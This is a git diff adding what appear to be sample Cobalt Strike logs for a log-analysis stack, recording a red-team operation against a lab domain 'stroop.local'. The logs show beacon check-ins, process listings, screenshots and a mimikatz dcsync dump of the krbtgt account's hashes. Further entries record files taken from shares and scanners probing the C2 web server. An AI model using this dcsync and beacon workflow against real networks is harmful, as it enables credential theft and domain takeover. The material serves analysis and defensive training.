AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1520 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1528 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1644 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1664 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1692 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1700 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1784 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1792 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1908 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1924 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1976 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1988 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2008 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1120 x64 NT AUTHORITY\SYSTEM 0 +Memory Compression 4 2128 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2164 x64 NT AUTHORITY\SYSTEM 0 +VSSVC.exe 696 2200 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2224 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 2252 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2300 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2380 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2392 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2432 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2516 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2532 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 2548 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2612 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2628 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2700 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2792 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2868 x64 NT AUTHORITY\SYSTEM 0 +spoolsv.exe 696 3036 x64 NT AUTHORITY\SYSTEM 0 +OfficeClickToRun.exe 696 3156 x64 NT AUTHORITY\SYSTEM 0 +sysmon64.exe 696 3176 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3188 x64 NT AUTHORITY\NETWORK SERVICE 0 +WaAppAgent.exe 696 3196 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3204 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3216 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 3224 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3232 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 3256 x64 NT AUTHORITY\SYSTEM 0 +MsMpEng.exe 696 3288 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureGuestAgent.exe 696 3300 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureTelemetryService.exe 696 3348 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3376 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 3392 x64 NT AUTHORITY\SYSTEM 0 +unsecapp.exe 920 3728 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3928 x64 NT AUTHORITY\LOCAL SERVICE 0 +WmiPrvSE.exe 920 3312 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 4320 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 4744 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 4776 x64 NT AUTHORITY\SYSTEM 0 +taskhostw.exe 1256 4688 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2656 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 5428 x64 NT AUTHORITY\LOCAL SERVICE 0 +WaSecAgentProv.exe 3196 6060 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 6060 6088 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1076 x64 NT AUTHORITY\LOCAL SERVICE 0 +SgrmBroker.exe 696 5940 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 6068 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 5920 x64 NT AUTHORITY\LOCAL SERVICE 0 +SearchIndexer.exe 696 5636 x64 NT AUTHORITY\SYSTEM 0 +SecurityHealthService.exe 696 4104 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 5788 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 5132 4300 x64 NT AUTHORITY\SYSTEM 2 +winlogon.exe 5132 4592 x64 NT AUTHORITY\SYSTEM 2 +dwm.exe 4592 3272 x64 Window Manager\DWM-2 2 +fontdrvhost.exe 4592 5980 x64 Font Driver Host\UMFD-2 2 +rdpclip.exe 1032 5588 x64 STROOP\ADMIN-W.Trommel 2 +sihost.exe 1520 464 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 4388 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 1116 x64 STROOP\ADMIN-W.Trommel 2 +taskhostw.exe 1256 1748 x64 STROOP\ADMIN-W.Trommel 2 +powershell.exe 1256 1464 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 5652 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 1464 1684 x64 STROOP\ADMIN-W.Trommel 2 +ctfmon.exe 5652 1060 x64 STROOP\ADMIN-W.Trommel 2 +explorer.exe 4684 4632 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 372 x64 STROOP\ADMIN-W.Trommel 2 +ShellExperienceHost.exe 920 6160 x64 STROOP\ADMIN-W.Trommel 2 +SearchUI.exe 920 6276 x64 STROOP\ADMIN-W.Trommel 2 +RuntimeBroker.exe 920 6464 x64 STROOP\ADMIN-W.Trommel 2 +RuntimeBroker.exe 920 6568 x64 STROOP\ADMIN-W.Trommel 2 +powershell.exe 1464 6908 x64 STROOP\ADMIN-W.Trommel 2 +conhost.exe 6908 6916 x64 STROOP\ADMIN-W.Trommel 2 +powershell.exe 1464 7004 x64 STROOP\ADMIN-W.Trommel 2 +conhost.exe 7004 7012 x64 STROOP\ADMIN-W.Trommel 2 +RuntimeBroker.exe 920 2296 x64 STROOP\ADMIN-W.Trommel 2 +iexplore.exe 920 6376 x64 STROOP\ADMIN-W.Trommel 2 +iexplore.exe 6376 2320 x86 STROOP\ADMIN-W.Trommel 2 +smartscreen.exe 920 7204 x64 STROOP\ADMIN-W.Trommel 2 +SecurityHealthSystray.exe 4632 7248 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 7532 x64 NT AUTHORITY\SYSTEM 0 +LogonUI.exe 4592 3888 x64 NT AUTHORITY\SYSTEM 2 +dllhost.exe 920 3128 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 4552 x64 STROOP\ADMIN-W.Trommel 2 +rundll32.exe 7372 3284 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 5168 x64 NT AUTHORITY\SYSTEM 0 +powershell.exe 3284 7776 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 7776 7548 x64 NT AUTHORITY\SYSTEM 0 +WmiPrvSE.exe 920 1092 x64 NT AUTHORITY\LOCAL SERVICE 0 +SearchProtocolHost.exe 5636 7836 x64 NT AUTHORITY\SYSTEM 0 +SearchFilterHost.exe 5636 8020 x64 NT AUTHORITY\SYSTEM 0 + + +03/30 09:37:47 UTC [input] screenshot 4632 x64 +03/30 09:37:47 UTC [task] Tasked beacon to take a screenshot in 4632/x64 +03/30 09:38:13 UTC [checkin] host called home, sent: 197218 bytes diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.4.10/beacon_702687076.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.4.10/beacon_702687076.log new file mode 100644 index 00000000..18a4e54f --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.4.10/beacon_702687076.log @@ -0,0 +1,216 @@ +03/30 09:06:37 UTC [metadata] beacon_22170412 -> 10.1.4.10; computer: L-WIN227; user: ADMIN-w.trommel; process: SecurityHealthSystray.exe; pid: 7248; os: Windows; version: 10.0; beacon arch: x64 (x64) +03/30 09:06:33 UTC [output] +established link to parent beacon: 10.1.4.10 + +03/30 09:06:58 UTC [input] dcsync stroop.local stroop\krbtgt +03/30 09:06:58 UTC [task] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:stroop.local /user:stroop\krbtgt command +03/30 09:06:58 UTC [checkin] host called home, sent: 417354 bytes +03/30 09:06:59 UTC [output] +received output: +[DC] 'stroop.local' will be the domain +[DC] 'S-WIN21.stroop.local' will be the DC server +[DC] 'stroop\krbtgt' will be the user account + +Object RDN : krbtgt + +** SAM ACCOUNT ** + +SAM Username : krbtgt +Account Type : 30000000 ( USER_OBJECT ) +User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT ) +Account expiration : +Password last change : 3/29/2020 9:54:08 AM +Object Security ID : S-1-5-21-2163199188-2306780613-1636707950-502 +Object Relative ID : 502 + +Credentials: + Hash NTLM: f7cd9145a9b7c2f6e342e2ab85dc540e + ntlm- 0: f7cd9145a9b7c2f6e342e2ab85dc540e + lm - 0: edb5f8b368bf3e8a7d7323447e185e7f + +Supplemental Credentials: +* Primary:Kerberos-Newer-Keys * + Default Salt : STROOP.LOCALkrbtgt + Default Iterations : 4096 + Credentials + aes256_hmac (4096) : c6569bece97962c95f12ee527f0cefba22934fe63098b1f9d789347b949ec14b + aes128_hmac (4096) : 6f8306a0f0c80d30068dd8e6b4f7fc26 + des_cbc_md5 (4096) : f70732e5b673b398 + +* Primary:Kerberos * + Default Salt : STROOP.LOCALkrbtgt + Credentials + des_cbc_md5 : f70732e5b673b398 + +* Packages * + Kerberos-Newer-Keys + +* Primary:WDigest * + 01 3e05f97129646f6380d255125068cd2e + 02 25a5fc433c6b575e4215bd5846f05a4a + 03 1063028e974d41cdcb88fe01dbb20bec + 04 3e05f97129646f6380d255125068cd2e + 05 25a5fc433c6b575e4215bd5846f05a4a + 06 0791eb9218513143b8a53ac9aed2176f + 07 3e05f97129646f6380d255125068cd2e + 08 33255ca329b031d292598c9b9fe7d63b + 09 33255ca329b031d292598c9b9fe7d63b + 10 c3b59c8eea10bc63de3283ba2ae653f8 + 11 fc47502b7fc17d42d664d5c7464eb6ec + 12 33255ca329b031d292598c9b9fe7d63b + 13 cc1fcadc0c9d3971fdfeecb6dce3572e + 14 fc47502b7fc17d42d664d5c7464eb6ec + 15 fa966dc5f8347c79c7ba6c88119ade18 + 16 fa966dc5f8347c79c7ba6c88119ade18 + 17 2aa8b89401f4f93b6a9b11cd36f3188f + 18 6caaf3241ccf42403153e44a901e603f + 19 49ca18f2b0046b48a76437f3c19b29ef + 20 961296ba01fbdad428b891e3a9026565 + 21 742917cb3f80b2da64e2fa31c06fd1a8 + 22 742917cb3f80b2da64e2fa31c06fd1a8 + 23 b3a86bc78731e4347ad6b839c0f844ac + 24 fba7489f07fee7d55f109cc4db19a282 + 25 fba7489f07fee7d55f109cc4db19a282 + 26 d8ea861857a6e9381b4ae2703a154e89 + 27 4f1f2ecf0cf9f74318b3275c091efda8 + 28 fd24b5e823acb8e5fe3029e42e0501ea + 29 2c5722f5bc0da4ce5ff26b3c0f93ebd1 + + + +03/30 09:08:02 UTC [input] screenshot +03/30 09:08:02 UTC [task] Tasked beacon to take screenshot +03/30 09:08:03 UTC [checkin] host called home, sent: 197186 bytes +03/30 09:08:30 UTC [input] ps +03/30 09:08:30 UTC [task] Tasked beacon to list processes +03/30 09:08:34 UTC [checkin] host called home, sent: 12 bytes +03/30 09:08:34 UTC [output] +[System Process] 0 0 +System 0 4 +Registry 4 88 +smss.exe 4 404 +csrss.exe 492 512 +wininit.exe 492 588 +csrss.exe 580 596 +winlogon.exe 580 684 +services.exe 588 696 +lsass.exe 588 732 +svchost.exe 696 832 +fontdrvhost.exe 588 844 +fontdrvhost.exe 684 852 +svchost.exe 696 920 +svchost.exe 696 968 +svchost.exe 696 1012 +LogonUI.exe 684 584 +dwm.exe 684 652 +svchost.exe 696 1008 +svchost.exe 696 1032 +svchost.exe 696 1052 +svchost.exe 696 1064 +svchost.exe 696 1172 +svchost.exe 696 1192 +svchost.exe 696 1208 +svchost.exe 696 1256 +svchost.exe 696 1312 +svchost.exe 696 1376 +svchost.exe 696 1456 +svchost.exe 696 1484 +svchost.exe 696 1520 +svchost.exe 696 1528 +svchost.exe 696 1644 +svchost.exe 696 1664 +svchost.exe 696 1692 +svchost.exe 696 1700 +svchost.exe 696 1784 +svchost.exe 696 1792 +svchost.exe 696 1908 +svchost.exe 696 1924 +svchost.exe 696 1976 +svchost.exe 696 1988 +svchost.exe 696 2008 +svchost.exe 696 1120 +Memory Compression 4 2128 +svchost.exe 696 2164 +VSSVC.exe 696 2200 +svchost.exe 696 2224 +svchost.exe 696 2252 +svchost.exe 696 2300 +svchost.exe 696 2380 +svchost.exe 696 2392 +svchost.exe 696 2432 +svchost.exe 696 2516 +svchost.exe 696 2532 +svchost.exe 696 2548 +svchost.exe 696 2612 +svchost.exe 696 2628 +svchost.exe 696 2700 +svchost.exe 696 2792 +svchost.exe 696 2868 +spoolsv.exe 696 3036 +OfficeClickToRun.exe 696 3156 +sysmon64.exe 696 3176 +svchost.exe 696 3188 +WaAppAgent.exe 696 3196 +svchost.exe 696 3204 +svchost.exe 696 3216 +svchost.exe 696 3224 +svchost.exe 696 3232 +svchost.exe 696 3256 +MsMpEng.exe 696 3288 +WindowsAzureGuestAgent.exe 696 3300 +WindowsAzureTelemetryService.exe 696 3348 +svchost.exe 696 3376 +svchost.exe 696 3392 +unsecapp.exe 920 3728 +svchost.exe 696 3928 +WmiPrvSE.exe 920 3312 +svchost.exe 696 4320 +svchost.exe 696 4744 +svchost.exe 696 4776 +taskhostw.exe 1256 4688 +svchost.exe 696 2656 +svchost.exe 696 5428 +WaSecAgentProv.exe 3196 6060 +conhost.exe 6060 6088 +svchost.exe 696 1076 +SgrmBroker.exe 696 5940 +svchost.exe 696 6068 +svchost.exe 696 5920 +SearchIndexer.exe 696 5636 +SecurityHealthService.exe 696 4104 +svchost.exe 696 5788 +csrss.exe 5132 4300 +winlogon.exe 5132 4592 +dwm.exe 4592 3272 +fontdrvhost.exe 4592 5980 +rdpclip.exe 1032 5588 x64 STROOP\ADMIN-w.trommel 2 +sihost.exe 1520 464 x64 STROOP\ADMIN-w.trommel 2 +svchost.exe 696 4388 x64 STROOP\ADMIN-w.trommel 2 +svchost.exe 696 1116 x64 STROOP\ADMIN-w.trommel 2 +taskhostw.exe 1256 1748 x64 STROOP\ADMIN-w.trommel 2 +powershell.exe 1256 1464 x64 STROOP\ADMIN-w.trommel 2 +svchost.exe 696 5652 +conhost.exe 1464 1684 x64 STROOP\ADMIN-w.trommel 2 +ctfmon.exe 5652 1060 x64 STROOP\ADMIN-w.trommel 2 +explorer.exe 4684 4632 x64 STROOP\ADMIN-w.trommel 2 +svchost.exe 696 372 x64 STROOP\ADMIN-w.trommel 2 +ShellExperienceHost.exe 920 6160 x64 STROOP\ADMIN-w.trommel 2 +SearchUI.exe 920 6276 x64 STROOP\ADMIN-w.trommel 2 +RuntimeBroker.exe 920 6464 x64 STROOP\ADMIN-w.trommel 2 +RuntimeBroker.exe 920 6568 x64 STROOP\ADMIN-w.trommel 2 +powershell.exe 1464 6908 x64 STROOP\ADMIN-w.trommel 2 +conhost.exe 6908 6916 x64 STROOP\ADMIN-w.trommel 2 +powershell.exe 1464 7004 x64 STROOP\ADMIN-w.trommel 2 +conhost.exe 7004 7012 x64 STROOP\ADMIN-w.trommel 2 +RuntimeBroker.exe 920 2296 x64 STROOP\ADMIN-w.trommel 2 +iexplore.exe 920 6376 x64 STROOP\ADMIN-w.trommel 2 +iexplore.exe 6376 2320 x86 STROOP\ADMIN-w.trommel 2 +smartscreen.exe 920 7204 x64 STROOP\ADMIN-w.trommel 2 +SecurityHealthSystray.exe 4632 7248 x64 STROOP\ADMIN-w.trommel 2 +svchost.exe 696 7532 +LogonUI.exe 4592 3888 +dllhost.exe 920 3128 x64 STROOP\ADMIN-w.trommel 2 +svchost.exe 696 4552 x64 STROOP\ADMIN-w.trommel 2 +rundll32.exe 7372 3284 + + diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/downloads.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/downloads.log new file mode 100644 index 00000000..9023c91b --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/downloads.log @@ -0,0 +1,3 @@ +03/30 09:30:59 UTC 10.1.3.10 358093816 114 /root/cobaltstrike/downloads/fa59012fc passwords.txt.txt H:\ +03/30 09:31:04 UTC 10.1.3.10 358093816 1056424 /root/cobaltstrike/downloads/c006e2856 RecipeTeammeeting_Apr1_newrecipes.pptx H:\ +03/30 09:34:26 UTC 10.1.3.10 358093816 113354 /root/cobaltstrike/downloads/518edf74d sysmonconfig-export.xml \\s-win43\Software\ diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/events.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/events.log new file mode 100644 index 00000000..58204532 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/events.log @@ -0,0 +1,10 @@ +03/30 07:07:24 UTC *** MarcS joined +03/30 07:55:39 UTC *** initial beacon from w.tax@10.1.3.10 (L-WIN223) +03/30 08:13:47 UTC *** initial beacon from w.tax@10.1.3.10 (L-WIN223) +03/30 08:41:18 UTC *** initial beacon from w.tax@10.1.3.10 (L-WIN223) +03/30 08:44:13 UTC *** initial beacon from W.Tax *@10.1.3.11 (L-WIN224) +03/30 09:04:07 UTC *** initial beacon from SYSTEM *@10.1.4.10 (L-WIN227) +03/30 09:06:33 UTC *** initial beacon from ADMIN-w.trommel@10.1.4.10 (L-WIN227) +03/30 09:10:51 UTC *** initial beacon from ADMIN-W.Trommel *@10.1.2.10 (S-WIN21) +03/30 15:37:41 UTC *** MarcS quit +03/30 20:03:00 UTC *** neo quit diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/weblog_80.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/weblog_80.log new file mode 100644 index 00000000..4f169a88 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/weblog_80.log @@ -0,0 +1,365 @@ +2.63.126.116 unknown unknown [03/30 00:34:10 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +37.221.248.237 unknown unknown [03/30 00:50:19 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +171.67.70.85 unknown unknown [03/30 01:02:53 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +195.168.64.90 unknown unknown [03/30 01:16:02 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +83.97.20.34 unknown unknown [03/30 01:41:45 UTC] "GET /" 404 0 "" "null" +95.255.116.17 unknown unknown [03/30 01:53:44 UTC] "GET /" 404 0 "" "null" +164.68.112.178 unknown unknown [03/30 02:33:11 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" +162.243.128.38 unknown unknown [03/30 04:36:48 UTC] "GET /manager/text/list/" 200 208983 "beacon beacon stager x86" "Mozilla/5.0 zgrab/0.x" +132.232.201.218 unknown unknown [03/30 05:19:31 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:19:31 UTC] "GET /robots.txt" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:19:38 UTC] "GET /" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +132.232.201.218 unknown unknown [03/30 05:19:39 UTC] "GET /l.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +132.232.201.218 unknown unknown [03/30 05:19:43 UTC] "GET /phpinfo.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +132.232.201.218 unknown unknown [03/30 05:19:43 UTC] "GET /test.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +132.232.201.218 unknown unknown [03/30 05:19:44 UTC] "POST /index.php" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0" +132.232.201.218 unknown unknown [03/30 05:19:48 UTC] "POST /forum.php" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0" +132.232.201.218 unknown unknown [03/30 05:19:51 UTC] "POST /forums.php" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0" +132.232.201.218 unknown unknown [03/30 05:19:51 UTC] "POST /bbs/index.php" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0" +132.232.201.218 unknown unknown [03/30 05:19:52 UTC] "POST /forum/index.php" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0" +132.232.201.218 unknown unknown [03/30 05:19:54 UTC] "POST /forums/index.php" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0" +132.232.201.218 unknown unknown [03/30 05:19:56 UTC] "POST /cgi-bin/php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" +132.232.201.218 unknown unknown [03/30 05:19:57 UTC] "POST /cgi-bin/php5" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" +132.232.201.218 unknown unknown [03/30 05:19:59 UTC] "POST /cgi-bin/php.cgi" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" +132.232.201.218 unknown unknown [03/30 05:20:03 UTC] "POST /base/post.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" +132.232.201.218 unknown unknown [03/30 05:20:05 UTC] "GET /webdav/" 404 0 "" "Mozilla/5.0" +132.232.201.218 unknown unknown [03/30 05:20:05 UTC] "GET /ispirit/im/upload.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:06 UTC] "GET /help.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:10 UTC] "GET /java.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:15 UTC] "GET /_query.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:19 UTC] "GET /test.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:20 UTC] "GET /db_cts.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:22 UTC] "GET /db_pma.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:23 UTC] "GET /logon.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:23 UTC] "GET /help-e.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:24 UTC] "GET /license.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:27 UTC] "GET /log.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:27 UTC] "GET /hell.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:28 UTC] "GET /pmd_online.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:28 UTC] "GET /x.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:30 UTC] "GET /shell.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:31 UTC] "GET /htdocs.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:32 UTC] "GET /b.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:32 UTC] "GET /sane.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:33 UTC] "GET /desktop.ini.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:36 UTC] "GET /z.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:36 UTC] "GET /lala.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:37 UTC] "GET /lala-dpr.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:37 UTC] "GET /wpc.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:38 UTC] "GET /wpo.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:39 UTC] "GET /t6nv.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:40 UTC] "GET /muhstik.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:40 UTC] "GET /text.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:40 UTC] "GET /wp-config.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:42 UTC] "GET /muhstik.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:43 UTC] "GET /muhstik2.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:47 UTC] "GET /muhstik-dpr.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" +132.232.201.218 unknown unknown [03/30 05:20:52 UTC] "GET 